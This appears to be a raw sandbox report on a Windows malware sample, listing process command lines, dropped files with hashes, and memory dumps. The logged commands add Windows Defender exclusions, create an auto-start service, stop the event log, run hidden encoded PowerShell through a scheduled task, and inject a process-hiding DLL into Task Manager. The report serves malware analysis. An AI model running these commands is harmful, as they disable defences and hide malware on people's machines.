"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1748 --field-trial-handle=1620,i,8530759317711239256,3514417821878428945,131072 /prefetch:2
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.4.287277354\1800174919" -childID 3 -isForBrowser -prefsHandle 4900 -prefMapHandle 4888 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd4df618-05ae-4ff0-834e-39f6601cedb9} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 4908 24bcec42058 tab
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.5.2009227957\796973654" -parentBuildID 20221007134813 -prefsHandle 5212 -prefMapHandle 5208 -prefsLen 26486 -prefMapSize 233480 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb1ae83d-5221-41d4-bb34-1b5e6e8f21aa} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5244 24bcf1cae58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.6.1883631940\1970643758" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5300 -prefMapHandle 5244 -prefsLen 26486 -prefMapSize 233480 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f7bc680-cbb4-4054-a5a9-566ba81216bf} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5392 24bcf1c7e58 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.9.1388435135\1378157438" -childID 6 -isForBrowser -prefsHandle 5888 -prefMapHandle 5892 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3d5abc3-e937-429f-a294-f7ee2687c317} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5880 24bcf1c9958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.8.1828702560\1670586747" -childID 5 -isForBrowser -prefsHandle 5696 -prefMapHandle 5700 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a440858-8b1c-4e2a-8303-06f8cfb47e9e} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5688 24bcf1c8a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.7.1883471339\268086337" -childID 4 -isForBrowser -prefsHandle 5544 -prefMapHandle 5264 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e1ace20-eab0-44f3-9cbe-fbbc77f222e3} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5556 24bce9e0658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.10.808435501\1696470453" -childID 7 -isForBrowser -prefsHandle 5864 -prefMapHandle 5544 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2625ed8-c874-43c8-8d53-dc1329b17134} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5768 24bb3f68158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HLfrKneGcZPtnWVS /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "THYAWYFT"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HLfrKneGcZPtnWVS /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.11.285895284\63954093" -childID 8 -isForBrowser -prefsHandle 6416 -prefMapHandle 5700 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {114ba84e-8841-4789-b131-8224bb4accd1} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 6196 24bcc56b858 tab
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "THYAWYFT" binpath= "C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe" start= "auto"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwdUevBUP" /SC once /ST 04:47:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "THYAWYFT"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwdUevBUP"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3076 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3864 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4708 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
Network
Files
\??\pipe\LOCAL\crashpad_4160_EMYSBVWCJFNAPXIB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 90bbaa873cb1024ace83f887dfde38ae |
| SHA1 | 922416490e14f9098df969a56b75e7523f108e53 |
| SHA256 | 2ff8abbbdad2acf5f04a3b47624055a0f2c36a09b0db3945b494f7eb92ae87bc |
| SHA512 | 60587031845ee5ae354c760bd2714a47ff561d3bd6e8aab7b2073d1b9c6b544c7eca94078d9cdefcd87b44adce4e814852c1e8f6af8ca3bdd5b0ddd0312e57b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f831193de1315d55f6de2430e877a6af |
| SHA1 | 77afb006d2853d4369023ac712d645b75c3233b6 |
| SHA256 | 86b54dbfcc362afc08ed77eeed7776bbe904ce3c436cc173b3ca82ccecda594d |
| SHA512 | df87b78be81e01bd44c885551bf52e264ec694298abc467d02d7c1daac27746506839a0cb2306ef53052a1163f117765f06b26aa646b19f7c184ca0042b28e87 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b4963922a208aab1fb8a42ba2975114e |
| SHA1 | 548c89019786a9f4595b4a2f8d10508a23aaeab3 |
| SHA256 | a1e694d78227d21d04867fe7f79afc2b1fcb293bc12896b4c2e88b6c7b8f6372 |
| SHA512 | 60eb84ae8c595ddc935b384b940db34e84a0d0bb913159314ddd944c22b0f9b697594f4b4c85ffa46391660c86ae0ab4aaeb4e117a412476851fb891e9e0e282 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ff30575a691ae0c791f6379c2ee2d806 |
| SHA1 | 61208275ba11d41d45073139b5268593d831ade4 |
| SHA256 | 624f475a5138b76f67b70f42052b19e895eb16b6b6b0a5aa450414ab0a17b1c1 |
| SHA512 | f444d517616ba83821576eb6ceaec787c06e0bde8a5bd922679824e6e8d0682a48aff037efb123fccfc6254f63d8f993ff40235869eba459a3bedb878d593dd4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 38e0f825a71c236dde48aa2f551fc800 |
| SHA1 | 1aff06111b765ed4e382b9216101e1f54a09d73e |
| SHA256 | 8018002d860e6370cd760a83b61d41f77cfb9473aeafbf630b27e4b4a7c100bf |
| SHA512 | 28fc9207402287a3742a8b409aa0db3d570cbd8e456c4ece1ced7b34b6d22f8fd0a2f699142090a9fe54062b35082560012ae80aa9785ce2b21da0aa9bd40399 |
C:\Users\Admin\Downloads\file_release_v3.rar
| MD5 | adc726cb9548c65b9f1e5cee01df6313 |
| SHA1 | b81b9e46467f03c20080e9f1af06bb435a53575a |
| SHA256 | e02c35b03b95fce000ec01dc607f41d176e18db1859fb70bd0502d5718f8c996 |
| SHA512 | fd247e10e1fb025d738e25c6a8556a9a213b292283701b0a77160825ca82abb84c4449209e03a74ea0117cd73bc8ff4b99e63ba0e0793abb1ff40ec42acc05a3 |
C:\Users\Admin\Downloads\file_release_v3.rar:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 55f4e7bdceb9edfeb27be98691f0f7dd |
| SHA1 | 3b91b0c1f4977e2bfc7ba4edac9f0536fe637330 |
| SHA256 | 773c142116270c2a31487d8c0d7b4ab2d778fcb73c66e3e4a87a2d5e15e7043c |
| SHA512 | 8863c2511ca7f32985e4c96e6ecf84a10f2a2181d44d9bf7c569c2e3470a3588fcdbe3c45baf6394fb03fca77aa1f3045a73f6a7476a0c665fd7c12cb34768e0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5c8a452dee4dce5986284b6a55f47034 |
| SHA1 | fb0a86afc000cdcb655b0cc3b7f01ef19c1f3445 |
| SHA256 | b0868da4dec11733b9e4ba03929809ec2f5e22b4576eced96236421b653981db |
| SHA512 | c3dccdf528c276311cb7501da60e7f2d47a8d7554161119c8c2c565996f7d33a8d406d8938c76d916c7fc45acec32bb498c70102708e7e82f2724e16fe907c26 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 593280444bf503fd9574d492d9610fef |
| SHA1 | 1206a0e0a4b9e48a493d6389b852b6107a7c9ab8 |
| SHA256 | d791cea609e69302dd12f6d90064759ad7b3632eba6d7bc55e1ceee4b99e265f |
| SHA512 | 37aaeae264c6513005c78b9f1c09bc0f9950ed12081e4f4310ae0e39c7d65e5ad21f18e7bf263cf7e9e98a5c7650713ab6413b21ec793415f6b89152b6db7883 |
C:\Users\Admin\Downloads\file_release_v3.rar
| MD5 | 5050b2e6c0f96d61180e992bd6a43df5 |
| SHA1 | afc30c8cfd29329f43e13871afd490977168ab47 |
| SHA256 | a020f867fd17bc216c7ac920e74f747811dd3b282cd9ffbfcf805c2100f712b3 |
| SHA512 | 4414e0c72cf52c505d34fb4487c0874f8535c7bb11f16c894376d5e91f0a7f6360762820b17bc8bbc008026740038f4546db7c11f9bc6bbc0962c12ce305ce64 |
C:\Users\Admin\Desktop\setup.exe
| MD5 | 61043e5685d2905a0fb0c3374f59dcb8 |
| SHA1 | 2291cad6a279e1d5ca4daf344d2c4d299572c47e |
| SHA256 | 33d54a803280188d9b8a0905fa2dcd7883294ea4b999023449015e456d758275 |
| SHA512 | 06f50e5c152affb2440cbb7abf0fc7ad702ca74690cfccf52ecd86f1402d4b346065a9d0becdc6d373c52f502d3536d8e5be0d5349185f432c9073329d9ee460 |
C:\Users\Admin\Desktop\setup.exe
| MD5 | 0be8d621d9db8ab12bdb9f6f4044f8e8 |
| SHA1 | 70bfa066f852b70898943c5a75ebec00ef3652ff |
| SHA256 | d869bd681e7e5b0d0aae82ccb95cc12f6879056d36a289f652918783ac3257a0 |
| SHA512 | f07af324f6e7c86b6c79c50f626d92638409cb98d3a7594b46d43aed0ef2230abd1c6e106f5a59ff7152cf5649f9fe005e89ae23fd1aa1b4c487569a07817e2d |
memory/1604-516-0x0000000140000000-0x00000001409C3000-memory.dmp
memory/1604-517-0x0000000140000000-0x00000001409C3000-memory.dmp
memory/1604-518-0x00007FFF48200000-0x00007FFF482BD000-memory.dmp
memory/1604-519-0x00007FFF48200000-0x00007FFF482BD000-memory.dmp
memory/1604-521-0x00007FFF00000000-0x00007FFF00002000-memory.dmp
memory/1604-520-0x0000000140000000-0x00000001409C3000-memory.dmp
memory/1604-522-0x00007FFF00030000-0x00007FFF00031000-memory.dmp
memory/1604-523-0x0000000140000000-0x00000001409C3000-memory.dmp
memory/1604-525-0x00007FFF46820000-0x00007FFF46B94000-memory.dmp
memory/1604-524-0x0000000140000000-0x00000001409C3000-memory.dmp
memory/1604-527-0x00007FFF48EA0000-0x00007FFF490A9000-memory.dmp
memory/1604-526-0x0000000140000000-0x00000001409C3000-memory.dmp
memory/1604-528-0x0000000140000000-0x00000001409C3000-memory.dmp
memory/1604-536-0x0000000140000000-0x00000001409C3000-memory.dmp
C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe
| MD5 | 1219df11783b6f39dec2d0995a921e1e |
| SHA1 | 334bafdbbde3f08cbc801a7416c92558861f5490 |
| SHA256 | f771550108f464a600238e6f5b7a9f764d67cfd0609e60a9543ecd7ffc6bfa52 |
| SHA512 | 627245358dea0cc78657c5bf7704d397b43d3d81feb378aac88c0e46ab3ed17cfc6bb63dacc534668d084b99e4c5adb398b7723d71b7460fab9be92e03ebe7b8 |
C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe
| MD5 | dd8020a5c57f99fd58bf7d7b01a6064f |
| SHA1 | 3ca4298da1c91b958eb52fd5f564cc2e9058dca4 |
| SHA256 | fa871ab730c0babd9ac15c33fddfd4ec0579b9caf9249f3713605bd38c448b0b |
| SHA512 | 160a0bc22b2889df5052e4f87d30c4176809287eac90c1ef310adf8286ab319972a1d824f03cec764fe1e492fa85605140f60ac34e090cf8d9e0d52d2b4978e5 |
C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe
| MD5 | 2911526b3f69b6f014fd23ad2169a885 |
| SHA1 | bfc9dcbea68743aa66c982015b987dc5435dd2ae |
| SHA256 | 0d20028b323346a82bd3892807619fcc8aeebad2e30f98a820a13667420e0c05 |
| SHA512 | 063851e8a19b06ad6affb0863a7b9cca6da71636d14a0e42b45d8d8404c27fddc4ff1847b81583f307745d48bd65a275f1b7c38f2e143a0a6ff718457502b9c6 |
C:\Users\Admin\Documents\GuardFox\Uihk1vSUEflfVRVgJ3Rfr90q.exe
| MD5 | e505232eedb83a9c0513552cbd9f1416 |
| SHA1 | eb09c116abc964202e4b3a83e2ccb493b8a0e835 |
| SHA256 | bab1f6a71c57fbc5f7541859a637d020a8468d95bcb2aaa5b8665068878eb74f |
| SHA512 | a03f3ead5afa386d22e09c723dcb089715fad3f11a8fb733b61f3a70b968460c7c4511e76bfda3f0c896e21c10613c96877b517ca820d534b7e5add43bd20619 |
C:\Users\Admin\Documents\GuardFox\DCEVEfkW_wIVRTVwXOeHDfD8.exe
| MD5 | 285a7f7150a57828fd050a714dd01f1a |
| SHA1 | d8673a623315864f0834239d2f68f81751d37930 |
| SHA256 | 0db9d975dd51a99ce80e4d7433205c630bfb4ecb6a149145490620f095df4312 |
| SHA512 | ff6ba1c32c2100915a44e194de4b9a7c2d910368601b4fb847f18d7caf9fb81afbf3e2918aaed41fbf830348cca5a7f8ad3a8066446386245a27e794a4ebada0 |
C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe
| MD5 | 17c30463a5a32c0a19c5eae86bc2664e |
| SHA1 | 7d44ab4864fb8926d798a69d411c8027789fa836 |
| SHA256 | 0802308c5afb2f3925853e43e0e6cbd22e6878a655dd9e204edde0e4c4d7e824 |
| SHA512 | 32cf2e04c417bd378a6f49c28d963eb8d0a1ffacacaf85ad796a257eb3d18e89aed3f4e7fb8e1c889897b6990c52bee1484ca8bc648f5fd91300385a22516f36 |
memory/1604-582-0x0000000140000000-0x00000001409C3000-memory.dmp
C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe
| MD5 | 61b39f3884a139a488afd3e11c2fa04f |
| SHA1 | 537685e2ffbdc79b70c6144dc719c860f45b88eb |
| SHA256 | 2723e3a76a77d0d7fff9c2e27956f31c68b7dd747dfad2f263dc7dc3386416eb |
| SHA512 | 6b734ee5549fe9441b3fa2db145c9c00d72c8e70e09624e1768dfe3a5d15cd78f744915470c64de8fb1e0db4cb14d184ec462e70626a96c516a3ef28730527f1 |
C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe
| MD5 | cbe403618cf0b7d98b55abeccf54f3e7 |
| SHA1 | 03f1b6cfdeec82323b8cacbfaaa2fb8b889528c5 |
| SHA256 | 3e77e94d37d91b7b619444b786c8509e0d660e4689e92d0d0f239057e23a38ca |
| SHA512 | 18957f7ac113f2eb7aa6e0a5b16c6b3fd0ab2d7a5394cae96c603da4af98d21d867525b633b572060db34b6dd7fb1a865c7d3ab813fd09b40c44b347589f0be4 |
C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe
| MD5 | 968c3bd14f887d3838ba080d0efeb935 |
| SHA1 | 709b2627b03c6ee5f97ee0d6fd642828437ea8b9 |
| SHA256 | 1b4f11696e547ef8011d84955caf7708ebaa035582c129e8fa7540f206dda98e |
| SHA512 | c64f866e8daa841704ac1aa717c6338cbe80ea1ca4962a0e034f874cdacf93e69f3072f796fa1f34fe4dccd4a51b90e4a3a891785429a2bd676ec93d9774c49a |
C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe
| MD5 | b3771825f1078fa8872b3f1d39c2ba59 |
| SHA1 | 6d452be3cceb06211cfb0c5c2fa690a9c63fd7e0 |
| SHA256 | 4caeab4aa0c9c971870a94218c8ad7e8624866c561f104a5b32f99d57e6264ea |
| SHA512 | c6946c2be7aa6d85997223963adeb2816e01c49ebfef234c7860f3b61df0bd900f596bd4881931743a4de1339aa8a8411cbf0ca129f12665d7852073f3e600d3 |
C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe
| MD5 | 84e5ccdfbdfd9d92456c890e6d8641d4 |
| SHA1 | bc1f99c3a86a6a3258e6baa57c26be3a4403146e |
| SHA256 | d4b9f4354252a9c203a211d8d600113f9d236ecca6234f43b5aa02350b5b24cc |
| SHA512 | 5f57e132b811e83f167f4b624397262b83982c9781dd05cba20bd2de798fcf1fd010c268060fcdf5601d5c2af1d4a61c2ff8a3ed659a25ceb6a3ef1034b8cf4c |
C:\Users\Admin\Documents\GuardFox\r2UFDQC620faMK7tnGEjaJBS.exe
| MD5 | 8e02fd1b378b1fd44b8aeada99bffba8 |
| SHA1 | 35b1c7dbbe6d687d688afef696eeaf9bb316341c |
| SHA256 | 08a1b7d938b2499e3592762507e28198bba635e670cdd520805dc3e4b95b3665 |
| SHA512 | af8881b654d2f8b451b0a183ed141a479dd252a48fb76ce45d5e925ff033b92827deffcab12c16cd9ef627bc89eedae82bfecfbfa0851ea083cd45b242f7c4f8 |
C:\Users\Admin\Documents\GuardFox\rZUqtgFOnTXixEJY_mn7T2Sl.exe
| MD5 | 8e582355d02b45f536e72cf17091877a |
| SHA1 | dc606ad9dec14725003f9ef1c0fd30e5ff3b29eb |
| SHA256 | fb7ffefe60cfd0ef95468b27cb5028b11b1b397ae15e55d9ca7f8fbd14ca342e |
| SHA512 | 644c1f8ed0563606c7eccf0b095a8c3e34200c58f244d6ad89e7705242f5ba6f26772681883e0e5c8d8d5d741bcca3cb0a51c91d82ec622e8a9ef27dae9f1082 |
C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe
| MD5 | e4619d88b0282cd9adeeecd348ff93d9 |
| SHA1 | a33bd0e7e674ed0bb40eb656783368274782cdc8 |
| SHA256 | 6e94b34cc64185a4f602eb03363797cbc7d52c04837d91b6beabb2d8843436e0 |
| SHA512 | c5c73498eda7d0253649029b6a645cb32ae581d3176b7d82fb174453d4b6f0549c92291bcd8de7028696f0f37abb407e5547d6704405f3ea949838a7b104565e |
C:\Users\Admin\Documents\GuardFox\63ijbZSUSBbYSuS8tRrtLvEY.exe
| MD5 | 87450400b33aa86f8432c171b3ebc126 |
| SHA1 | 876e38e46eacb51ff83c43a6ad1cace7c424c672 |
| SHA256 | 8ea5fa824f784dda0e1e049fabb8d6630198cf721622b09b859c009a52b8daf9 |
| SHA512 | 2a5488681493cebb563302904a2ff924973d587f68a203b966a637af894ea8234ff56a9d9cc81b55bd517e47227fc59c6525fb5ae7f61969ee628a00df345d44 |
C:\Users\Admin\Documents\GuardFox\L_WvMAjCxMVRwXtcjB8fqJFZ.exe
| MD5 | 38bfd3a28dbdb92fb5e47715a3db04e6 |
| SHA1 | 420b669473af72344de00d8966621f0d127bf95c |
